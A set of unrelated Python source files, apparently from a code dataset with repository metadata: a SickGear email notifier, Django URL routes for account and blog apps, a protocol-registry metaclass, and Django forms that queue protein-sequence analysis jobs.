email_list.append(email_address)
return list(set(email_list))
    def _sendmail(self, host, port, smtp_from, use_tls, user, pwd, to, msg, smtp_debug=False):
        """
        Deliver *msg* through the configured SMTP server.

        :param host: SMTP host name
        :param port: SMTP port (string or int)
        :param smtp_from: envelope sender address
        :param use_tls: truthy value to negotiate STARTTLS
        :param user: SMTP auth user (empty disables login)
        :param pwd: SMTP auth password (empty disables login)
        :param to: list of recipient addresses
        :param msg: email.mime message to send
        :param smtp_debug: True to enable smtplib protocol debugging
        :return: True on success, False on any error (details in self.last_err)
        """
        # Config may store use_tls loosely (bool/str/int); normalise to bool.
        use_tls = 1 == sickbeard.helpers.tryInt(use_tls)
        # Only authenticate when both a user and a password are set.
        login = any(user) and any(pwd)
        logger.log(u'Sendmail HOST: %s; PORT: %s; LOGIN: %s, TLS: %s, USER: %s, FROM: %s, TO: %s' % (
            host, port, login, use_tls, user, smtp_from, to), logger.DEBUG)
        try:
            srv = smtplib.SMTP(host, int(port))
            if smtp_debug:
                srv.set_debuglevel(1)
            if use_tls or login:
                # EHLO is required before STARTTLS and before AUTH.
                srv.ehlo()
                logger.log(u'Sent initial EHLO command', logger.DEBUG)
                if use_tls:
                    srv.starttls()
                    # Re-EHLO after STARTTLS, as the TLS session resets state.
                    srv.ehlo()
                    logger.log(u'Sent STARTTLS and EHLO command', logger.DEBUG)
                if login:
                    srv.login(user, pwd)
                    logger.log(u'Sent LOGIN command', logger.DEBUG)
            srv.sendmail(smtp_from, to, msg.as_string())
            srv.quit()
        except Exception as e:
            # Remember the failure so _send_email can log it.
            self.last_err = '%s' % e
            return False
        return True
# Export hook: the class itself (not an instance) is assigned here.
# NOTE(review): confirm the notifiers framework instantiates this, matching
# the convention of the other notifier modules.
notifier = EmailNotifier
|
jetskijoe/SickGear
|
sickbeard/notifiers/emailnotify.py
|
Python
|
gpl-3.0
| 7,110
|
from django.conf.urls.defaults import url, patterns
from django.contrib.aderit.access_account.views import (LoginView, LogoutView,
UpdateView,
ChangePasswordView,
ForgotPasswordView,
DetailView)
from account.models import Account
from account.utils import callback_on_login, callback_on_signup
from account.views import SignupView
# Route table for the account app.  Every route is served by a configured
# aderit access_account class-based view, most sharing the
# account_form_as_ul.html form template.
# NOTE(review): django.conf.urls.defaults and patterns() are pre-Django-1.6
# APIs -- confirm the project's Django version before porting.
urlpatterns = patterns('',
                       # Root URL: plain login form, redirects to '/' on success.
                       (r'^$', LoginView.as_view(redirect_to='/', allow_token=True,
                                                 template_name="account/account_form_as_ul.html")),
                       # Login, optionally via a one-shot token embedded in the URL.
                       url(r'^login/((?P<token>.+)/)?$',
                           LoginView.as_view(allow_token=True,
                                             after_login_callback=callback_on_login,
                                             debug_dispatch_method=False,
                                             template_name="account/account_form_as_ul.html",
                                             delete_token_after_use=True),
                           name='login'),
                       # Logout: clears response cookies and returns to '/'.
                       url(r'^logout/$',
                           LogoutView.as_view(redirect_to='/', clean_response_cookies=True, debug_dispatch_method=False),
                           name='logout'),
                       # Registration with captcha; the e-mail field is mandatory.
                       url(r'^signup/$',
                           SignupView.as_view(model=Account, use_captcha=True,
                                              additional_exclude_formfields=['token'],
                                              require_formfields=['email'],
                                              after_signup_callback=callback_on_signup,
                                              debug_dispatch_method=True, debug_dispatch_method_full=False,
                                              template_name="account/account_form_as_ul.html"),
                           name='signup'),
                       # Password change (login required; optional numeric account-id slug).
                       url(r'^password/change/((?P<slug>\d+)/)?$',
                           ChangePasswordView.as_view(model=Account, use_login_required_decorator=True,
                                                      template_name="account/account_form_as_ul.html",
                                                      change_done_template_name="account/pswchanged.html",
                                                      slug_field="id"),
                           name='chpsw'),
                       # Forgot-password flow; hands off to the 'chpsw' route to set a new one.
                       url(r'^password/forgot/((?P<token>.+)/)?$',
                           ForgotPasswordView.as_view(template_name="account/account_form_as_ul.html",
                                                      success_template_name="account/forgot_psw_ok.html",
                                                      change_password_named_url='chpsw'),
                           name='forgotpsw'),
                       # Profile edit (login required, no captcha).
                       url(r'^chprofile/(?P<slug>.*)/$',
                           UpdateView.as_view(model=Account, slug_field='id', additional_exclude_formfields=['token'],
                                              use_captcha=False, use_login_required_decorator=True,
                                              template_name="account/account_form_as_ul.html",
                                              success_url="/"),
                           name='chprofile'),
                       # Profile display (login required; optional numeric account-id slug).
                       url(r'^profile/((?P<slug>\d+)/?)?$',
                           DetailView.as_view(model=Account, use_login_required_decorator=True,
                                              template_name="account/profile.html",
                                              slug_field="id",
                                              context_object_name="account"),
                           name='profile'),
                       )
|
safanaj/django-contrib-aderit
|
project_template/account/urls.py
|
Python
|
gpl-3.0
| 3,092
|
"""
Define the base Protocol classes and meta-classes.
For documentation on broker and common message types see parlay.protocols::
"""
class InvalidProtocolDeclaration(Exception):
    """Raised when there was a problem with your protocol declaration."""


class ProtocolMeta(type):
    """Meta-class that keeps track of *all* protocol classes declared.

    Every class created with this metaclass is recorded in
    ``protocol_registry`` under its protocol name: the class attribute
    ``name`` when one is present, otherwise the class's own name.
    Declaring two protocols with the same name raises
    InvalidProtocolDeclaration.
    """

    # Maps protocol name -> protocol class; shared by all protocols.
    protocol_registry = {}

    def __init__(cls, name, bases, dct):
        # A class may override its registry key with a 'name' attribute.
        protocol_name = name if not hasattr(cls, 'name') else cls.name
        cls._protocol_type_name = protocol_name
        if protocol_name in ProtocolMeta.protocol_registry:
            # BUGFIX: the two adjacent string literals previously produced
            # "...declared.Please choose..." (missing separator space).
            raise InvalidProtocolDeclaration(protocol_name + " has already been declared. " +
                                             "Please choose a different protocol name")
        ProtocolMeta.protocol_registry[protocol_name] = cls
        super(ProtocolMeta, cls).__init__(name, bases, dct)
|
PromenadeSoftware/Parlay
|
parlay/protocols/meta_protocol.py
|
Python
|
gpl-3.0
| 1,074
|
from django.conf.urls import url, patterns, include
from django.conf import settings
from rest_framework.urlpatterns import format_suffix_patterns
from rest_framework import viewsets, routers
from blog.feeds import BlogPostFeed, BlogPostFeedByCategory
from blog import views
"""
# Routers provide an easy way of automatically determining the URL conf
router = routers.DefaultRouter()
router.register(r'categories', BlogCategoryViewSet)
from haystack.query import SearchQuerySet
from haystack.views import search_view_factory
sqs = SearchQuerySet().filter(site_id=settings.SITE_ID)
"""
# Blog Feeds
# Blog feed routes.
# BUGFIX: the feed patterns were plain (non-raw) strings containing "\w" and
# "\-"; those are invalid string escapes (DeprecationWarning since Python 3.6,
# SyntaxWarning in 3.12, slated to become an error). The byte content is
# unchanged -- only the literals are now raw, as regexes should be.
urlpatterns = patterns('',
    (r"^feed/(?P<cat_slug>[\w\-]+)/$", BlogPostFeedByCategory()),
    (r"^feed/$", BlogPostFeed()),
    #(r'^search/', include('haystack.urls')),
    #url(r'^search/', search_view_factory(searchqueryset=sqs), name="haystack_search"),
)
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browseable API.
# NOTE: the "blog.views" prefix only applies to string view names; every
# active entry below passes a callable, so the prefix is inert.
urlpatterns += patterns("blog.views",
    #url("^tag/(?P<tag>.*)/$", "blog_post_list", name="blog_post_list_tag"),
    #("^archive/(?P<year>\d{4})/(?P<month>\d{1,2})/$", "blog_post_list",
    #url("^author/(?P<username>.*)/$", "blog_post_list",
    #    name="blog_post_list_author"),
    #url("^archive/(?P<year>.*)/$", "blog_post_list",
    #    name="blog_post_list_year"),
    #url("^(?P<slug>[\-\d\w]*)$", "blog_post_detail", name="blog_post_detail"),
    #url("^(?P<slug>[\-\d\w]*)$", "blog_post_detail", name="blog_post_preview"),
    #("^archive/(?P<year>\d{4})/$", "archive_months"),
    #url("^archive/(?P<year>\d{4})/(?P<month>\d{1,2})/$", "blog_post_list", name="blog_post_list_month"),
    #url("^category/(?P<category>.*)/$", "blog_post_list", name="blog_post_list_category"),
    #url("^post_comment/(?P<blog_id>\d+)/$", 'blog_post_comment', name="blog_post_comment"),
    # REST API endpoints (Django REST Framework + Angular front end).
    url(r'^api/locations/$', views.LocationList.as_view(), name='location-list'),
    url(r'^api/categories/$', views.BlogCategoryList.as_view(), name='blogcategory-list'),
    url(r'^api/categories/(?P<slug>[\w\-]+)/$', views.BlogCategoryDetail.as_view(), name='blogcategory-detail'),
    url(r'^api/posts/$', views.BlogPostList.as_view(), name='blogpost-list'),
    url(r'^api/posts/(?P<slug>[\-\d\w]*)/$', views.BlogPostDetail.as_view(), name="blogpost-detail"),
    url(r'^api/photos/$', views.PhotoList.as_view(), name='photo-list'),
    # url(r'^app/partials/(?P<page>[-\w]+.html)/$', 'angular_views'),
    # url(r'^app/$', 'home', name="blog_home"),
    # Normal (server-rendered) views.
    url(r'^blog/(?P<category>[\w\-]+)/(?P<slug>[\w\-]+)/$', views.BlogPostDetailView.as_view(), name='post-detail-old'),
    url(r'^posts/(?P<slug>[\w\-]+)/$', views.BlogPostDetailView.as_view(), name='post-detail'),
    url(r'^(?P<category>[\w\-]*)$', views.BlogPostListView.as_view(), name='post-list'),
    #url(r'^$', views.BlogPostListView.as_view() , name="post-list"),
)
# Allow optional format suffixes (e.g. ".json") on the API routes.
urlpatterns = format_suffix_patterns(urlpatterns)
|
argonemyth/argonemyth-blog
|
blog/urls.py
|
Python
|
gpl-3.0
| 3,001
|
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 27 10:59:45 2014
@author: James Ahad
"""
from django import forms
from django.contrib.auth.models import User
from idp.models import UserProfile, Sequence, Sequence_seqdata, Sequence_jobs
class UserForm(forms.ModelForm):
    """Registration form exposing username/email/password on auth.User."""
    username = forms.CharField(help_text="Please enter a username.")
    email = forms.CharField(help_text="Please enter your email.")
    # Rendered as a masked input. NOTE(review): password hashing is
    # presumably handled by the view that saves this form -- confirm.
    password = forms.CharField(widget=forms.PasswordInput(), help_text="Please enter a password.")
    class Meta:
        model = User
        fields = ['username', 'email', 'password']
class UserProfileForm(forms.ModelForm):
    """Profile form for UserProfile; currently exposes no editable fields."""
    class Meta:
        model = UserProfile
        fields = ()
import idp.computation as comp
class SingleSequenceForm(forms.Form):
    """Submit one amino-acid sequence; computes and stores its parameters."""
    seq = forms.CharField(max_length = None, help_text = "Please enter an amino acid sequence")
    tag = forms.CharField(max_length=None, help_text = "Give your sequence a label")
    def __init__(self, user, *args, **kwargs):
        # Bind the submitting user; remaining args go to forms.Form.
        self.user = user
        super(SingleSequenceForm, self).__init__(*args, **kwargs)
    def save(self):
        """Create Sequence + Sequence_seqdata rows; returns the bound user.

        NOTE(review): unlike MultiSequenceForm.save, this stores the raw
        input (not comp.Sequence(...).seq), rounds values to 5 decimals,
        and does not set the N column -- confirm whether intentional.
        """
        seqstring = self.cleaned_data['seq']
        # Project-side analysis object providing the sequence metrics below.
        computeSeq = comp.Sequence(seqstring)
        from django.utils import timezone
        newSequence = Sequence(seq = seqstring,
                               tag = self.cleaned_data['tag'],
                               user = self.user,
                               submissionDate = timezone.now(),
                               seqProc = False,
                               jobProc = False,)
        newSequence.save()
        newSeqData = Sequence_seqdata(seq = newSequence,
                                      fplus = round(computeSeq.Fplus(),5),
                                      fminus = round(computeSeq.Fminus(),5),
                                      FCR = round(computeSeq.FCR(),5),
                                      NCPR = round(computeSeq.NCPR(),5),
                                      meanH = round(computeSeq.meanHydropathy(),5),
                                      sigma = round(computeSeq.sigma(),5),
                                      delta = round(computeSeq.delta(),5),
                                      dmax = round(computeSeq.deltaMax(),5),
                                      kappa = round(computeSeq.kappa(),5))
        newSeqData.save()
        # Flag the sequence as processed only after its data row exists.
        newSequence.seqProc = True
        newSequence.save()
        return self.user
class MultiSequenceForm(forms.Form):
    """Bulk-submit form: one amino-acid sequence per textarea line.

    Each new (per-user) sequence gets a Sequence row plus a computed
    Sequence_seqdata row; lines already submitted by this user are skipped.
    """
    # Typo fix in user-facing help text: "carraige" -> "carriage".
    seqlist = forms.CharField(widget=forms.Textarea(attrs={'cols': 500, 'rows':10}), help_text = "Please enter amino acid sequences separated by carriage returns")
    tag = forms.CharField(max_length=None, help_text = "Please enter your sequence category")

    def __init__(self, user, *args, **kwargs):
        # Bind the submitting user; remaining args go to forms.Form.
        self.user = user
        super(MultiSequenceForm, self).__init__(*args, **kwargs)

    def save(self):
        """Create Sequence + Sequence_seqdata rows for each new line."""
        # Hoisted out of the per-line loop: the original re-imported these
        # modules and rebuilt the same regex on every iteration.
        import re
        import string
        from django.utils import timezone
        strip_chars = re.compile('[%s%s%s]' % (string.whitespace, string.punctuation, string.digits))
        for seqstring in self.cleaned_data['seqlist'].split('\n'):
            # Keep letters only: whitespace, punctuation and digits are noise.
            inputtable = strip_chars.sub('', seqstring)
            if Sequence.objects.filter(seq = inputtable, user = self.user).exists():
                continue  # already submitted by this user
            computeSeq = comp.Sequence(inputtable)
            newSequence = Sequence(seq = computeSeq.seq,
                                   tag = self.cleaned_data['tag'],
                                   user = self.user,
                                   submissionDate = timezone.now(),
                                   seqProc = False,)
            newSequence.save()
            newSeqData = Sequence_seqdata(seq = newSequence,
                                          N = computeSeq.len,
                                          fplus = computeSeq.Fplus(),
                                          fminus = computeSeq.Fminus(),
                                          FCR = computeSeq.FCR(),
                                          NCPR = computeSeq.NCPR(),
                                          meanH = computeSeq.meanHydropathy(),
                                          sigma = computeSeq.sigma(),
                                          delta = computeSeq.delta(),
                                          dmax = computeSeq.deltaMax(),
                                          kappa = computeSeq.kappa())
            newSeqData.save()
            # Flag as processed only after the data row exists.
            newSequence.seqProc = True
            newSequence.save()
'''
class tagForm(forms.Form):
tag = forms.CharField(widget=forms.SelectMultiple, help_text = "What Sequences do you want to work with?")
def __init__(self, user, nextForm, *args, **kwargs):
self.user = user
self.nextForm = nextForm
super(MultiSequenceForm, self).__init__(*args, **kwargs)
def save(self):
'''
class wl_JobForm(forms.Form):
    '''Queue a Wang-Landau kappa density-of-states (or permutant) daemon job.

    FIXME:
    - Needs to handle Freeze File input
    - Needs to handle sequence design (aka be able to specify a range of kappa for permutant generation)
    '''
    seq = forms.ModelChoiceField(Sequence.objects.none(), help_text = 'Select sequence to solve for Kappa DoS')
    #seq = forms.ModelMultipleChoiceField(Sequence.objects.all())
    genPermutants = forms.NullBooleanField(help_text='Would you like to generate Kappa sequence permutants?')
    def __init__(self,user, *args, **kwargs):
        super(wl_JobForm,self).__init__(*args, **kwargs)
        self.user = user
        #q = Sequence.objects.all()
        # Restrict the choice field to this user's sequences, ordered by tag.
        q = Sequence.objects.filter(user = self.user)
        self.fields['seq'].queryset = q.extra(order_by = ['tag'])
    def launchJob(self):
        """Create a Sequence_jobs row and write the daemon input files.

        Returns the job; if an identical job already exists the status is
        set to 'ar' (presumably "already run" -- confirm) and no files are
        written or saved.
        """
        seqchoice = self.cleaned_data['seq']
        newJob = Sequence_jobs(seq = seqchoice, user = self.user)
        from django.conf import settings
        # Job flavour: permutant generation ('wlp') vs plain DoS ('wl').
        if(self.cleaned_data['genPermutants']):
            newJob.jobType = 'wlp'
            newJob.jobTypeVerbose = 'Kappa Permutant Generation'
            newJob.jobParameters = '' #these are initialized as empty until input files are generated
        else:
            newJob.jobType = 'wl'
            newJob.jobTypeVerbose = 'Kappa Density of States'
            newJob.jobParameters = '' #these are initialized as empty until input files are generated
        newJob.status = 'submitted'
        import os
        from extraFuncs import create_path
        newJob.outdir = os.path.normpath("%s/%d/%d/%s/" % (settings.DAEMON_OUT_PATH, newJob.user.pk, newJob.seq.pk, newJob.jobType))
        newJob.progressFile = os.path.join(newJob.outdir, 'progress.txt')
        # Duplicate job guard: never queue the same (sequence, type) twice.
        if(Sequence_jobs.objects.filter(seq = newJob.seq, jobType = newJob.jobType).exists()):
            newJob.status = 'ar'
            return newJob
        #Make input files
        inputFileName = "%d_%d_%s" % (newJob.user.pk, newJob.seq.pk, newJob.jobType)
        inputFilePath = os.path.normpath("%s/%d/%d/%s/" % (settings.DAEMON_IN_PATH, newJob.user.pk, newJob.seq.pk, newJob.jobType))
        create_path(inputFilePath)
        #Progress File
        with open(os.path.join(inputFilePath, 'progress.txt'), 'w') as f:
            f.write('submitted')
            f.close()  # redundant inside 'with' (harmless)
        #Sequence File
        # NOTE(review): this writes the Sequence *model instance* (its str()),
        # whereas hetero_JobForm uses seqchoice.seq -- likely should be the
        # raw sequence string here too; confirm against the daemon's reader.
        with open(os.path.join(inputFilePath, 'seqfile.txt'), 'w') as f:
            f.write(seqchoice)
            f.close()
        newJob.jobParameters = '-s %s -o %s' % (os.path.join(inputFilePath, 'seqfile.txt'), inputFilePath)
        '''
        if(not frzfile is None):
            newJob.jobParameters += ' -f %s' % (frzfile)
        '''
        #Input File
        with open(os.path.join(inputFilePath, inputFileName), 'w') as f:
            f.write('User %s\n' % newJob.user.username)
            f.write('First %s\n' % newJob.user.first_name)
            f.write('Last %s\n' % newJob.user.last_name)
            f.write('Email %s\n' % newJob.user.email)
            f.write('JobName %s\n' % os.path.splitext(os.path.basename(inputFilePath))[0])
            f.write('JobType %s\n' % newJob.jobType)
            f.write('JobExe %s\n' % settings.WL_PATH)
            f.write('JobParameters %s\n' % newJob.jobParameters)
            f.write('OutDir %s\n' % newJob.outdir)
            f.close()
        newJob.save()
        return newJob
import computation as comp
class hetero_JobForm(forms.Form):
    """Queue an FRC trajectory-generation (CAMPARI) daemon job."""
    seq = forms.ModelChoiceField(Sequence.objects.none(), help_text = 'Select sequence')
    def __init__(self,user, *args, **kwargs):
        super(hetero_JobForm,self).__init__(*args, **kwargs)
        self.user = user
        #q = Sequence.objects.all()
        # Restrict the choice field to this user's sequences, ordered by tag.
        q = Sequence.objects.filter(user = self.user)
        self.fields['seq'].queryset = q.extra(order_by = ['tag'])
    def launchJob(self):
        """Create a Sequence_jobs row and write the daemon input files.

        Returns the job; an already-existing (sequence, type) job gets
        status 'ar' (presumably "already run" -- confirm) and is returned
        without writing files or saving.
        """
        from django.conf import settings
        seqchoice = self.cleaned_data['seq']
        newJob = Sequence_jobs(seq = seqchoice, user = self.user)
        newJob.jobType = 'hetero'
        newJob.jobTypeVerbose = 'FRC Trajectory Generation'
        newJob.jobParameters = '-k %s' % (settings.HETERO_KEY)
        newJob.status = 'submitted'
        import os
        from extraFuncs import create_path
        newJob.outdir = os.path.normpath("%s/%d/%d/%s/" % (settings.DAEMON_OUT_PATH, newJob.user.pk, newJob.seq.pk, newJob.jobType))
        newJob.progressFile = os.path.join(newJob.outdir, 'progress.txt')
        # Duplicate job guard: never queue the same (sequence, type) twice.
        if(Sequence_jobs.objects.filter(seq = newJob.seq, jobType = newJob.jobType).exists()):
            newJob.status = 'ar'
            return newJob
        #Make input files
        inputFileName = "%d_%d_%s" % (newJob.user.pk, newJob.seq.pk, newJob.jobType)
        inputFilePath = os.path.normpath("%s/%d/%d/%s/" % (settings.DAEMON_IN_PATH, newJob.user.pk, newJob.seq.pk, newJob.jobType))
        create_path(inputFilePath)
        #Progress File
        with open(os.path.join(inputFilePath, 'progress.txt'), 'w') as f:
            f.write('submitted')
            f.close()  # redundant inside 'with' (harmless)
        #Sequence File
        # CAMPARI-formatted sequence file produced by the analysis library.
        seqFilePath = os.path.join(inputFilePath, 'seq.in')
        comp.Sequence(seqchoice.seq).makeCampariSeqFile(seqFilePath)
        #Input File
        with open(os.path.join(inputFilePath, inputFileName), 'w') as f:
            f.write('User %s\n' % newJob.user.username)
            f.write('First %s\n' % newJob.user.first_name)
            f.write('Last %s\n' % newJob.user.last_name)
            f.write('Email %s\n' % newJob.user.email)
            f.write('JobName %s\n' % os.path.splitext(os.path.basename(inputFilePath))[0])
            f.write('JobType %s\n' % newJob.jobType)
            f.write('JobExe %s\n' % settings.CAMPARI_PATH)
            f.write('JobParameters %s\n' % newJob.jobParameters)
            f.write('OutDir %s\n' % newJob.outdir)
            f.close()
        newJob.save()
        return newJob
class tagForm(forms.Form):
    """Filter form offering the distinct tags of the bound user's sequences."""
    tag = forms.MultipleChoiceField(choices = [], help_text = 'Filter by sequence tag')

    def __init__(self, user, *args, **kwargs):
        super(tagForm, self).__init__(*args, **kwargs)
        self.user = user
        # Distinct tags across this user's sequences become the choices.
        distinct_tags = set()
        for seq in Sequence.objects.filter(user = self.user):
            distinct_tags.add(seq.tag)
        self.fields['tag'].choices = [(t, t) for t in distinct_tags]
        # BUGFIX: removed a leftover debug print(choiceField) that wrote to
        # stdout on every form instantiation.
class seqForm(forms.Form):
    """Select several sequences (after tag filtering) and render tables/plots."""
    seqs = forms.ModelMultipleChoiceField(Sequence.objects.none())
    def __init__(self,user, *args, **kwargs):
        super(seqForm,self).__init__(*args, **kwargs)
        self.user = user
        self.help_text = ''
    def fillField(self,tags):
        """Populate the 'seqs' choices with sequences carrying any of *tags*.

        NOTE(review): the query is not filtered by self.user, so sequences
        of other users with the same tag would appear -- confirm intent.
        """
        seqSet = Sequence.objects.none()
        for t in tags:
            seqSet = seqSet | Sequence.objects.filter(tag = t)
        self.fields['seqs'].queryset = seqSet
    def getSeqTable(self):
        """Return a django_tables2 table of the selected sequences' data."""
        try:
            seqlist = self.cleaned_data['seqs']
        except:
            # Unvalidated/unbound form: fall back to an empty selection.
            # NOTE(review): bare except also hides unrelated errors.
            seqlist = Sequence.objects.none()
        seqdata = Sequence_seqdata.objects.select_related().filter(seq = seqlist)
        import django_tables2 as tables
        class SeqDataTable(tables.Table):
            # Columns mirror the Sequence_seqdata fields shown to the user.
            pk = tables.Column(verbose_name = 'sequence id')
            FCR = tables.Column()
            NCPR = tables.Column()
            meanH = tables.Column(verbose_name = '<H>')
            dmax = tables.Column()
            kappa = tables.Column()
            class Meta:
                attrs = {'class': 'pure-table'}
        return SeqDataTable(seqdata)
    def getPhasePlot(self):
        """Render a phase plot (fplus vs fminus) to STATIC_PATH; return its filename."""
        try:
            seqlist = self.cleaned_data['seqs']
        except:
            seqlist = Sequence.objects.none()
        seqdata = Sequence_seqdata.objects.select_related().filter(seq = seqlist)
        fplus = []
        fminus = []
        labels = []
        for s in seqdata:
            fplus.append(s.fplus)
            fminus.append(s.fminus)
            # Label by pk when the sequence has no name.
            if(s.seq.name == ''):
                labels.append('%d' % (s.pk))
            else:
                labels.append(s.seq.name)
        from django.conf import settings
        import os
        from plotting import phasePlot
        # One temp file per user; subsequent calls overwrite it.
        saveDir = os.path.join(settings.STATIC_PATH, os.path.normpath('temp_%s_%s.png' %(self.user.username,'phase')))
        phasePlot(fplus,fminus,labels,saveDir)
        return os.path.basename(saveDir)
class singleSeqForm(forms.Form):
    """Select one sequence and render a per-residue distribution plot."""
    seqs = forms.ModelChoiceField(Sequence.objects.none())
    # Choice values are the strings '1'/'2'/'3'; see getPlot's dispatch.
    plotType = forms.ChoiceField(widget=forms.RadioSelect, choices=(('1','NCPR'),('2','Sigma'),('3','Hydropathy')), help_text='Select Plot Distribution')
    def __init__(self,user, *args, **kwargs):
        super(singleSeqForm,self).__init__(*args, **kwargs)
        self.user = user
        self.help_text = ''
    def fillField(self,tags):
        """Populate 'seqs' with sequences carrying any of *tags*.

        NOTE(review): not filtered by self.user -- same potential cross-user
        exposure as seqForm.fillField; confirm intent.
        """
        seqSet = Sequence.objects.none()
        for t in tags:
            seqSet = seqSet | Sequence.objects.filter(tag = t)
        self.fields['seqs'].queryset = seqSet
    def getSeqTable(self):
        """Return a django_tables2 table for the selected sequence."""
        try:
            seqlist = self.cleaned_data['seqs']
        except:
            # Unvalidated/unbound form: empty selection (bare except hides
            # other errors too -- NOTE(review)).
            seqlist = Sequence.objects.none()
        seqdata = Sequence_seqdata.objects.select_related().filter(seq = seqlist)
        import django_tables2 as tables
        class SeqDataTable(tables.Table):
            pk = tables.Column(verbose_name = 'sequence id')
            FCR = tables.Column()
            NCPR = tables.Column()
            sigma = tables.Column(verbose_name = 'Sigma')
            meanH = tables.Column(verbose_name = '<H>')
            dmax = tables.Column()
            kappa = tables.Column()
            class Meta:
                attrs = {'class': 'pure-table'}
        return SeqDataTable(seqdata)
    def getPlot(self):
        """Render the selected distribution plot; return the image filename.

        NOTE(review): if plotType is somehow none of '1'/'2'/'3', saveDir is
        never bound and the final print/return raises NameError -- confirm
        the ChoiceField guarantees coverage.
        """
        try:
            seqlist = self.cleaned_data['seqs']
            plotType = self.cleaned_data['plotType']
        except:
            seqlist = Sequence.objects.none()
            # Fallback mirrors the ('value', 'label') choice tuples, so
            # plotType[0] works for both the string and the tuple case.
            plotType = ('1', 'NCPR')
        seqdata = Sequence_seqdata.objects.select_related().filter(seq = seqlist)
        ps = None
        # Take the last matching row (selection holds at most one sequence).
        for s in seqdata:
            ps = s
        if(not ps is None):
            plotseq = comp.Sequence(ps.seq.seq)
        else:
            plotseq = None
        # Blob window length for the per-residue distributions.
        bloblen = 5
        from django.conf import settings
        import os
        from plotting import NCPRPlot, SigmaPlot, HydroPlot
        # NOTE(review): leftover debug output (Python 2 print statements).
        print 'im here'
        print(plotType)
        print(type(plotseq))
        if(plotType[0] == '1'):
            saveDir = os.path.join(settings.STATIC_PATH, os.path.normpath('temp_%s_%s.png' %(self.user.username,'NCPR')))
            NCPRPlot(plotseq,bloblen,saveDir)
        elif(plotType[0] == '2'):
            saveDir = os.path.join(settings.STATIC_PATH, os.path.normpath('temp_%s_%s.png' %(self.user.username,'sigma')))
            SigmaPlot(plotseq,bloblen,saveDir)
        elif(plotType[0] == '3'):
            saveDir = os.path.join(settings.STATIC_PATH, os.path.normpath('temp_%s_%s.png' %(self.user.username,'hydro')))
            HydroPlot(plotseq,bloblen,saveDir)
        print saveDir
        return os.path.basename(saveDir)
import time
class MassMultiSequenceForm(forms.Form):
    """Upload a file of sequences, one per line.

    process() queues the file as a daemon job (for very large batches);
    save() computes parameters inline, like MultiSequenceForm, but from
    the uploaded file.
    """
    # Typo fix in user-facing help text: "carraige" -> "carriage".
    seqfile = forms.FileField(help_text = "Please enter sequence file with amino acid sequences separated by carriage returns")
    tag = forms.CharField(max_length=None, help_text = "Please enter your sequence category")

    def __init__(self, user, *args, **kwargs):
        self.user = user
        super(MassMultiSequenceForm, self).__init__(*args, **kwargs)

    @staticmethod
    def _store_upload(outpath, f):
        # Stream the uploaded file to disk in chunks.
        with open(outpath, 'wb+') as destination:
            for chunk in f.chunks():
                destination.write(chunk)

    def process(self, f):
        """Queue a 'mass_seq' daemon job for uploaded file *f*; return the job."""
        from django.conf import settings
        import os
        from extraFuncs import create_path
        # All mass jobs hang off a per-user placeholder Sequence row.
        dummies = Sequence.objects.filter(user = self.user).filter(name = 'dummy')
        if(len(dummies) == 0):
            # NOTE(review): this dummy row is never save()d before being used
            # as a foreign key, and its submissionDate is a "%d/%m/%Y" string
            # unlike timezone.now() elsewhere -- confirm intent.
            dummySeq = Sequence(seq = '', name = 'dummy', tag = '', user = self.user, submissionDate = time.strftime("%d/%m/%Y"), seqProc = False)
        else:
            dummySeq = dummies[0]
        newJob = Sequence_jobs(seq = dummySeq, user = self.user)
        newJob.jobType = 'mass_seq'
        newJob.jobTypeVerbose = 'Mass Sequence Submission'
        newJob.status = 'submitted'
        newJob.outdir = os.path.normpath("%s/%d/%s/%s/" % (settings.DAEMON_OUT_PATH, newJob.user.pk, 'nonseq', newJob.jobType))
        newJob.progressFile = os.path.join(newJob.outdir, 'progress.txt')
        # Duplicate job guard ('ar' presumably means "already run" -- confirm).
        if(Sequence_jobs.objects.filter(seq = newJob.seq, jobType = newJob.jobType).exists()):
            newJob.status = 'ar'
            return newJob
        #Make input files
        inputFileName = "%d_%s_%s" % (newJob.user.pk, 'nonseq', newJob.jobType)
        inputFilePath = os.path.normpath("%s/%d/%s/%s/" % (settings.DAEMON_IN_PATH, newJob.user.pk, 'nonseq', newJob.jobType))
        create_path(inputFilePath)
        # BUGFIX: save the uploaded file and derive jobParameters *before*
        # writing the daemon input file -- the original wrote the input file
        # first, so its 'JobParameters' line recorded a stale/empty value
        # (unlike wl_JobForm/hetero_JobForm, which set it first).
        seqFilePath = os.path.join(inputFilePath, 'seqfile.txt')
        self._store_upload(seqFilePath, f)
        newJob.jobParameters = '-s %s' % (seqFilePath)
        #Input File
        with open(os.path.join(inputFilePath, inputFileName), 'w') as fh:
            fh.write('User %s\n' % newJob.user.username)
            fh.write('First %s\n' % newJob.user.first_name)
            fh.write('Last %s\n' % newJob.user.last_name)
            fh.write('Email %s\n' % newJob.user.email)
            fh.write('JobName %s\n' % os.path.splitext(os.path.basename(inputFilePath))[0])
            fh.write('JobType %s\n' % newJob.jobType)
            fh.write('JobExe %s\n' % settings.CAMPARI_PATH)
            fh.write('JobParameters %s\n' % newJob.jobParameters)
            fh.write('OutDir %s\n' % newJob.outdir)
        #Progress File
        with open(os.path.join(inputFilePath, 'progress.txt'), 'w') as fh:
            fh.write('submitted')
        newJob.save()
        return newJob

    def save(self):
        """Compute and store parameters for each new sequence in the upload.

        BUGFIX: the original read cleaned_data['seqlist'] (a field this form
        does not declare) and then iterated an undefined name 'seqlist',
        raising NameError; it now reads the declared 'seqfile' upload.
        """
        import re
        import string
        from django.utils import timezone
        contents = self.cleaned_data['seqfile'].read()
        strip_chars = re.compile('[%s%s%s]' % (string.whitespace, string.punctuation, string.digits))
        for seqstring in contents.split('\n'):
            inputtable = strip_chars.sub('', seqstring)
            if not inputtable:
                continue  # robustness: skip blank/noise-only lines
            if Sequence.objects.filter(seq = inputtable, user = self.user).exists():
                continue  # already submitted by this user
            computeSeq = comp.Sequence(inputtable)
            newSequence = Sequence(seq = computeSeq.seq,
                                   tag = self.cleaned_data['tag'],
                                   user = self.user,
                                   submissionDate = timezone.now(),
                                   seqProc = False,)
            newSequence.save()
            newSeqData = Sequence_seqdata(seq = newSequence,
                                          N = computeSeq.len,
                                          fplus = computeSeq.Fplus(),
                                          fminus = computeSeq.Fminus(),
                                          FCR = computeSeq.FCR(),
                                          NCPR = computeSeq.NCPR(),
                                          meanH = computeSeq.meanHydropathy(),
                                          sigma = computeSeq.sigma(),
                                          delta = computeSeq.delta(),
                                          dmax = computeSeq.deltaMax(),
